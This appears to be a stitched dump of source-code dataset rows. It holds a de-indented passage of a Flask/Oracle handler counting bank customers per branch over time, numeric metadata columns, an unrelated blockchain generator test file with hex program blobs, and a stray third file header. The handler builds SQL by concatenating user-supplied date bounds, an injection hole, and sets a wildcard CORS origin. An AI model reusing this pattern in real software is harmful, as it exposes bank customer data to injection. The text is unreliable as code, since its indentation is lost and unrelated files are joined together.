sqlcommand_check = ""
sqlcommand_check_term = "1=1"  # base predicate keeps the WHERE clause valid when either bound is missing
if len(lowerBound) > 0:
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if len(upperBound) > 0:
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_date0 AS c_a_date1,
CUSTOMER_CHECK_ACCOUNT.CUSTOMER_ID AS customer_id1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID0,
CHECK_ACCOUNT_REGDATE AS C_A_date0
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT, CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID0 = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate_month(result_check[i]['c_a_date1'].year,result_check[i]['c_a_date1'].month, rawData)
if loc == -1 :
#This month is not yet in rawData
term = {}
term['time'] = str(result_check[i]['c_a_date1'].year) + '.' + str(result_check[i]['c_a_date1'].month)
term[result_check[i]['b_name1']] = []
term[result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
#rawData has this month but not this record's branch; add it
rawData[loc][result_check[i]['b_name1']] = []
#Append the new customer to the branch's customer list
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
else:
if result_check[i]['customer_id1'] not in rawData[loc][result_check[i]['b_name1']]:
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = "1=1"  # base predicate keeps the WHERE clause valid when either bound is missing
if len(lowerBound) > 0:
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if len(upperBound) > 0:
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.d_a_date0 AS d_a_date1,
CUSTOMER_DEPOSIT_ACCOUNT.CUSTOMER_ID AS customer_id2
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID0,
DEPOSIT_ACCOUNT_REGDATE AS d_a_date0
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID0 = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#=============User statistics==savings===month granularity===result processing======
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate_month(result_deposit[i]['d_a_date1'].year, result_deposit[i]['d_a_date1'].month,rawData)
if loc == -1 :
#This month is not yet in rawData
term = {}
term['time'] = str(result_deposit[i]['d_a_date1'].year) + '.' + str(result_deposit[i]['d_a_date1'].month)
term[result_deposit[i]['b_name2']] = []
term[result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
#rawData has this month but not this record's branch; add it
rawData[loc][result_deposit[i]['b_name2']] = []
#Append the new customer to the branch's customer list
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
else:
if result_deposit[i]['customer_id2'] not in rawData[loc][result_deposit[i]['b_name2']]:
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
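# NOTE (hypothetical refactor): the make_response/jsonify block plus the three
# CORS headers is repeated verbatim in every branch of this handler. A small
# helper would collapse it; cors_json is an illustrative name, not part of
# this file:
#
# def cors_json(payload):
#     response = make_response(jsonify(payload))
#     response.headers['Access-Control-Allow-Origin'] = '*'
#     response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
#     response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
#     return response
#
# ...after which each branch could end with, e.g.:
# return cors_json({'code': 200, 'columnList': columnList, 'rawData': rawData})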
#===============================Quarter granularity=====================================================================
elif timegrain == 'season':#---
#-------check-----account-----
sqlcommand_check = ""
sqlcommand_check_term = "1=1"  # base predicate keeps the WHERE clause valid when either bound is missing
if len(lowerBound) > 0:
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if len(upperBound) > 0:
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_date0 AS c_a_date1,
CUSTOMER_CHECK_ACCOUNT.CUSTOMER_ID AS customer_id1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID0,
CHECK_ACCOUNT_REGDATE AS C_A_date0
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT, CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID0 = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate_season(result_check[i]['c_a_date1'].year,result_check[i]['c_a_date1'].month, rawData)
if loc == -1 :
#This quarter is not yet in rawData
term = {}
s = math.ceil(result_check[i]['c_a_date1'].month/3)
term['time'] = str(result_check[i]['c_a_date1'].year) + '-' + str(s)
term[result_check[i]['b_name1']] = []
term[result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
#rawData has this quarter but not this record's branch; add it
rawData[loc][result_check[i]['b_name1']] = []
#Append the new customer to the branch's customer list
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
else:
if result_check[i]['customer_id1'] not in rawData[loc][result_check[i]['b_name1']]:
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = "1=1"  # base predicate keeps the WHERE clause valid when either bound is missing
if len(lowerBound) > 0:
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if len(upperBound) > 0:
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.d_a_date0 AS d_a_date1,
CUSTOMER_DEPOSIT_ACCOUNT.CUSTOMER_ID AS customer_id2
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID0,
DEPOSIT_ACCOUNT_REGDATE AS d_a_date0
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID0 = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#=============User statistics==savings===quarter granularity===result processing======
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate_season(result_deposit[i]['d_a_date1'].year, result_deposit[i]['d_a_date1'].month,rawData)
if loc == -1 :
#This quarter is not yet in rawData
term = {}
s = math.ceil(result_deposit[i]['d_a_date1'].month/3)
term['time'] = str(result_deposit[i]['d_a_date1'].year) + '-' + str(s)
term[result_deposit[i]['b_name2']] = []
term[result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
#rawData has this quarter but not this record's branch; add it
rawData[loc][result_deposit[i]['b_name2']] = []
#Append the new customer to the branch's customer list
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
else:
if result_deposit[i]['customer_id2'] not in rawData[loc][result_deposit[i]['b_name2']]:
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
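# NOTE (hypothetical hardening): the date bounds above are spliced into the SQL
# text by string concatenation. cx_Oracle supports named bind variables, which
# sidesteps quoting bugs and SQL injection; an illustrative rewrite of the
# bound-building step (names are ours, not the file's):
#
# terms, binds = ["1=1"], {}
# if lowerBound:
#     terms.append("CHECK_ACCOUNT_REGDATE > TO_DATE(:lower,'YYYY-MM-DD')")
#     binds['lower'] = lowerBound
# if upperBound:
#     terms.append("CHECK_ACCOUNT_REGDATE < TO_DATE(:upper,'YYYY-MM-DD')")
#     binds['upper'] = upperBound
# cursor.execute(base_sql + " AND ".join(terms), binds)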
#===================================Loan business==================================================================
elif sumtype == 'loan':
#===============================Year granularity=====================================================================
if timegrain == 'year':#---
sqlcommand_loan = ""
sqlcommand_loan_term = "1=1"  # base predicate keeps the WHERE clause valid when either bound is missing
if len(lowerBound) > 0:
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if len(upperBound) > 0:
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
LOAN.BANK_NAME AS b_name3,
LOAN_CUSTOMER.CUSTOMER_ID AS customer_id3,
NEW_PAY.pay_date0 AS pay_date3
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN, LOAN_CUSTOMER
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID and NEW_PAY.loan_id0 = LOAN_CUSTOMER.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------User statistics----loan business-------result processing---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['b_name3'] not in columnList:
columnList.append(result_loan[i]['b_name3'])
for i in range(len(result_loan)):
loc = locate(result_loan[i]['pay_date3'].year, rawData)
if loc == -1 :
#This year is not yet in rawData
term = {}
term['time'] = str(result_loan[i]['pay_date3'].year)
term[result_loan[i]['b_name3']] = []
term[result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
rawData.append(term)
else:
if result_loan[i]['b_name3'] not in rawData[loc]:
#rawData has this year but not this record's branch; add it
rawData[loc][result_loan[i]['b_name3']] = []
#Append the new customer to the branch's customer list
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
else:
if result_loan[i]['customer_id3'] not in rawData[loc][result_loan[i]['b_name3']]:
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
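# NOTE (hypothetical refactor): the dedup-and-count pattern above -- lists of
# customer ids that are later collapsed to len() -- maps naturally onto sets:
#
# from collections import defaultdict
# counts = defaultdict(lambda: defaultdict(set))  # period -> branch -> {customer ids}
# for row in result_loan:
#     counts[str(row['pay_date3'].year)][row['b_name3']].add(row['customer_id3'])
# rawData = [{'time': t, **{b: len(ids) for b, ids in branches.items()}}
#            for t, branches in counts.items()]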
#===============================Month granularity=====================================================================
elif timegrain == 'month':#---
sqlcommand_loan = ""
sqlcommand_loan_term = "1=1"  # base predicate keeps the WHERE clause valid when either bound is missing
if len(lowerBound) > 0:
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if len(upperBound) > 0:
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
LOAN.BANK_NAME AS b_name3,
LOAN_CUSTOMER.CUSTOMER_ID AS customer_id3,
NEW_PAY.pay_date0 AS pay_date3
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN, LOAN_CUSTOMER
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID and NEW_PAY.loan_id0 = LOAN_CUSTOMER.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------User statistics----loan business-------result processing---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['b_name3'] not in columnList:
columnList.append(result_loan[i]['b_name3'])
for i in range(len(result_loan)):
loc = locate_month(result_loan[i]['pay_date3'].year,result_loan[i]['pay_date3'].month, rawData)
if loc == -1 :
#This month is not yet in rawData
term = {}
term['time'] = str(result_loan[i]['pay_date3'].year)+'.'+str(result_loan[i]['pay_date3'].month)
term[result_loan[i]['b_name3']] = []
term[result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
rawData.append(term)
else:
if result_loan[i]['b_name3'] not in rawData[loc]:
#rawData has this month but not this record's branch; add it
rawData[loc][result_loan[i]['b_name3']] = []
#Append the new customer to the branch's customer list
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
else:
if result_loan[i]['customer_id3'] not in rawData[loc][result_loan[i]['b_name3']]:
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
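# Quarter index used in the season branch below: math.ceil(month / 3) maps
# months 1-3 -> 1, 4-6 -> 2, 7-9 -> 3, 10-12 -> 4; e.g. math.ceil(8 / 3) == 3,
# so August 2021 is labelled '2021-3'.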
#===============================Quarter granularity=====================================================================
elif timegrain == 'season':#---
sqlcommand_loan = ""
sqlcommand_loan_term = "1=1"  # base predicate keeps the WHERE clause valid when either bound is missing
if len(lowerBound) > 0:
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if len(upperBound) > 0:
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
LOAN.BANK_NAME AS b_name3,
LOAN_CUSTOMER.CUSTOMER_ID AS customer_id3,
NEW_PAY.pay_date0 AS pay_date3
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN, LOAN_CUSTOMER
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID and NEW_PAY.loan_id0 = LOAN_CUSTOMER.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------User statistics----loan business-------result processing---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['b_name3'] not in columnList:
columnList.append(result_loan[i]['b_name3'])
for i in range(len(result_loan)):
loc = locate_season(result_loan[i]['pay_date3'].year,result_loan[i]['pay_date3'].month, rawData)
if loc == -1 :
#This quarter is not yet in rawData
term = {}
s = math.ceil(result_loan[i]['pay_date3'].month/3)
term['time'] = str(result_loan[i]['pay_date3'].year)+'-' + str(s)
term[result_loan[i]['b_name3']] = []
term[result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
rawData.append(term)
else:
if result_loan[i]['b_name3'] not in rawData[loc]:
#rawData has this quarter but not this record's branch; add it
rawData[loc][result_loan[i]['b_name3']] = []
#Append the new customer to the branch's customer list
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
else:
if result_loan[i]['customer_id3'] not in rawData[loc][result_loan[i]['b_name3']]:
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#response = make_response(jsonify({
# 'code':200,
# 'columnList':['合肥支行','南京支行','上海支行','杭州支行','宁波支行'],
# 'rawData':[
# {'time':'2018','合肥支行':25,'南京支行':45,'上海支行':21,'杭州支行':41,'宁波支行':25},
# {'time':'2019','合肥支行':52,'南京支行':5,'上海支行':121,'杭州支行':52,'宁波支行':20},
# ]
# })
# )
| 49.597776
| 158
| 0.412351
| 10,483
| 129,351
| 4.796719
| 0.026328
| 0.042658
| 0.032018
| 0.060138
| 0.965715
| 0.944774
| 0.939921
| 0.93314
| 0.925642
| 0.918403
| 0
| 0.013217
| 0.477685
| 129,351
| 2,607
| 159
| 49.616801
| 0.730914
| 0.085434
| 0
| 0.823018
| 0
| 0
| 0.319017
| 0.080413
| 0
| 0
| 0
| 0.000384
| 0
| 1
| 0.003257
| false
| 0
| 0.008686
| 0.000543
| 0.035831
| 0.046688
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
92dff9b06bd13c4f727be4df42ef9580193cceb5
| 4,250
|
py
|
Python
|
tests/generator/test_generator_types.py
|
grayfallstown/covid-blockchain
|
194d5351c70d3ee5d928f767e21c7894cfbb59a7
|
[
"Apache-2.0"
] | 14
|
2021-07-28T09:56:07.000Z
|
2022-02-09T04:28:14.000Z
|
tests/generator/test_generator_types.py
|
grayfallstown/covid-blockchain
|
194d5351c70d3ee5d928f767e21c7894cfbb59a7
|
[
"Apache-2.0"
] | 23
|
2021-07-28T10:16:56.000Z
|
2022-03-26T10:43:53.000Z
|
tests/generator/test_generator_types.py
|
grayfallstown/covid-blockchain
|
194d5351c70d3ee5d928f767e21c7894cfbb59a7
|
[
"Apache-2.0"
] | 9
|
2021-07-28T02:41:24.000Z
|
2022-03-15T08:32:49.000Z
|
from typing import Dict
from unittest import TestCase
from covid.types.blockchain_format.program import Program, SerializedProgram
from covid.types.generator_types import GeneratorBlockCacheInterface
from covid.full_node.generator import create_block_generator, create_generator_args
from covid.util.ints import uint32
gen0 = SerializedProgram.from_bytes(
bytes.fromhex(
"ff01ffffffa00000000000000000000000000000000000000000000000000000000000000000ff830186a080ffffff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3ff018080ffff80ffff01ffff33ffa06b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9ff830186a08080ff8080808080" # noqa
)
)
gen1 = SerializedProgram.from_bytes(
bytes.fromhex(
"ff01ffffffa00000000000000000000000000000000000000000000000000000000000000000ff830186a080ffffff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3ff018080ffff80ffff01ffff33ffa06b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9ff830186a08080ff8080808080" # noqa
)
)
gen2 = SerializedProgram.from_bytes(
bytes.fromhex(
"ff01ffffffa00000000000000000000000000000000000000000000000000000000000000000ff830186a080ffffff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3ff018080ffff80ffff01ffff33ffa06b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9ff830186a08080ff8080808080" # noqa
)
)
class BlockDict(GeneratorBlockCacheInterface):
def __init__(self, d: Dict[uint32, SerializedProgram]):
self.d = d
def get_generator_for_block_height(self, index: uint32) -> SerializedProgram:
return self.d[index]
class TestGeneratorTypes(TestCase):
def test_make_generator(self):
block_dict = BlockDict({uint32(1): gen1})
gen = create_block_generator(gen2, [uint32(1)], block_dict)
print(gen)
def test_make_generator_args(self):
generator_ref_list = [gen1]
gen_args = create_generator_args(generator_ref_list)
gen_args_as_program = Program.from_bytes(bytes(gen_args))
# First Argument to the block generator is the first template generator
arg2 = gen_args_as_program.first().first()
print(arg2)
assert arg2 == bytes(gen1)
# It's not a list anymore.
# TODO: Test the first three arg positions passed through here.
# def test_generator_arg_is_list(self):
# generator_ref_list = [Program.to(b"gen1"), Program.to(b"gen2")]
# gen_args = create_generator_args(generator_ref_list)
# gen_args_as_program = Program.from_bytes(bytes(gen_args))
# arg2 = gen_args_as_program.rest().first()
# assert arg2 == binutils.assemble("('gen1' 'gen2')")
# print(arg2)
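# NOTE (illustrative analogy, not the covid/chia API): a serialized program is
# a cons tree, so .first()/.rest() walk it like nested pairs. The assertion in
# test_make_generator_args -- gen_args_as_program.first().first() == bytes(gen1)
# -- reads "the first argument is a list whose first element is gen1". A
# hypothetical pure-Python mirror of that access pattern:
#
# args = ((b"gen1", ()), ())            # cons cells as (head, tail) pairs
# first = lambda pair: pair[0]
# assert first(first(args)) == b"gen1"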
| 69.672131
| 804
| 0.866118
| 237
| 4,250
| 15.274262
| 0.308017
| 0.01547
| 0.019337
| 0.01768
| 0.744751
| 0.733702
| 0.733702
| 0.047514
| 0.047514
| 0.047514
| 0
| 0.343264
| 0.091765
| 4,250
| 60
| 805
| 70.833333
| 0.59456
| 0.119529
| 0
| 0.157895
| 0
| 0
| 0.632511
| 0.632511
| 0
| 1
| 0
| 0.016667
| 0.026316
| 1
| 0.105263
| false
| 0
| 0.157895
| 0.026316
| 0.342105
| 0.052632
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
135e068202aa307c1a7095066d694be6c97c2d4e
| 19,782
|
py
|
Python
|
tests/test_implementations/test_sqlalchemy/api_test/test_delete_many_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 123
|
2021-08-17T01:54:12.000Z
|
2022-03-29T20:41:56.000Z
|
tests/test_implementations/test_sqlalchemy/api_test/test_delete_many_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 10
|
2021-12-28T21:34:20.000Z
|
2022-03-16T13:31:24.000Z
|
tests/test_implementations/test_sqlalchemy/api_test/test_delete_many_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 10
|
2021-08-17T07:37:36.000Z
|
2022-03-31T13:16:55.000Z
|
import json
